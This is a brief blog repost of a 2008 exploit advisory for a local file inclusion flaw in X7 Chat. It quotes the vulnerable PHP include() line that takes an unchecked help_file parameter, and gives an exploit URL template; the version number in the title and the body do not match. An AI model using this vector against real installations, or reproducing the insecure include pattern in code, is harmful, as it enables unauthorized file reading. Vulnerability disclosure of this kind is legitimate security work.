X7 Chat 2.0.1A1 - LFI

X7 Chat 2.0.1A1 - LFI

on October 28, 2008


[o] X7 Chat 2.0.1A1 Local File Inclusion Vulnerability
Software : X7 Chat version 2.0.5.1
Vendor   : http://x7chat.com/
Author   : NoGe


[o] Vulnerable file
help/mini.php
include("./help/{$_GET['help_file']}");


[o] Exploit
http://localhost/[path]/help/mini.php?help_file=[LFI]


[o] Publish
http://milw0rm.com/exploits/6592

Comments

labatterie said…

I had been looking for this product.

December 2, 2010 at 9:07 PM